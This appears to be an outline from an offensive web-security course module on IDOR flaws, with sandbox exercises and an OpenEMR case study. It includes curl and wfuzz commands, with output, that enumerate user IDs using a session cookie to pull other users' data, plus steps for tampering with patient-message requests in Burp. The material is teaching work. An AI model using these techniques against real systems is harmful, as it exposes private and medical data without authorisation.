Module 15: Insecure Direct Object Referencing

Introduction to IDOR

Static File IDOR

Static File IDOR Landing Page

Sample routing

/users/:userIdent/documents/:pdfFile
/trains/:from-:to
/book/:year-:author

Routed URI Examples

/users/18293017/documents/file-15 (PDF Retrieved)
/trains/LVIV-ODESSA               (Ticket File Retrieved)
/book/1996-GeorgeRRMartin         (Book Retrieved)

Database Object Referencing (ID-Based) IDOR

Example IDOR for a Database Object

http://idor-sandbox:80/customerPage/?custId=1

Exploiting IDOR in the Sandbox

Accessing the IDOR Sandbox Application

Start the VPN, the VM, and add its IP and hostname to your hosts file.

Exploiting Static File IDOR

Click "File-Based IDOR"

File-Based IDOR URI

Contents of the file

Setting ?f=2.txt

Exploiting ID-Based IDOR

ID-Based IDOR

The /customerPage/?custId= URI

The Rendered Content

Incrementing the custId Database Parameter by one

Because we retrieved information through the web browser for a separate user entirely that corresponds with a Customer ID value of "2", we can guess this was the second registered user for the web application.

Exploiting More Complex IDOR

Logging in as User Harb

Harb's Data

Gathering Erroneous Response Sizes

kali@kali:~$ curl -s http://idor-sandbox:80/user/?uid=62718 -w '%{size_download}'
0

We got 0 because we didn't include a valid session ID.

Gathering a valid session ID

Gathering Erroneous Response Sizes with a Session ID

kali@kali:~$ curl -s /dev/null http://idor-sandbox:80/user/?uid=91191 -w '%{size_download}' --header "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
...
2873

Fuzzing 100,000 possible UIDs

kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt --hc 404 --hh 2873 -H "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64" http://idor-sandbox:80/user/?uid=FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://idor-sandbox:80/user/?uid=FUZZ
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000011112:   200        76 L     174 W      2859 Ch     "11111"
000016328:   200        76 L     174 W      2860 Ch     "16327"
000023102:   200        76 L     174 W      2874 Ch     "23101"
000039202:   200        76 L     174 W      2867 Ch     "39201"
000041913:   200        76 L     174 W      2861 Ch     "41912"
000057192:   200        76 L     174 W      2863 Ch     "57191"
000062719:   200        76 L     174 W      2871 Ch     "62718"
000074833:   200        76 L     175 W      2868 Ch     "74832"
000083272:   200        76 L     174 W      2858 Ch     "83271"
000099181:   200        76 L     174 W      2866 Ch     "99180"

Total time: 755.6711
Processed Requests: 100000
Filtered Requests: 99990
Requests/sec.: 132.3327

Exfiltrated Data

Extra Miles

Do the labs.

Case Study: OpenEMR

Accessing The OpenEMR Case Study

Start the VPN, the VM, and add the IP/hostname to your hosts file.

Discovery of the IDOR Vulnerability

OpenEMR Landing Page

Login form

Dashboard Panel for OpenEMR

Message Center - Tab

Message Center - Tab Content

Individual Patient Messages

Turning on Burp Suite's Intercept Feature

Clicking Print message

Intercepted Request in Burp Suite

Request in Repeater

Exploiting the IDOR Vulnerability

Exfiltrated Data for Parameter Value of 11

Trying again with a value of 10

Extra Mile

Do the lab.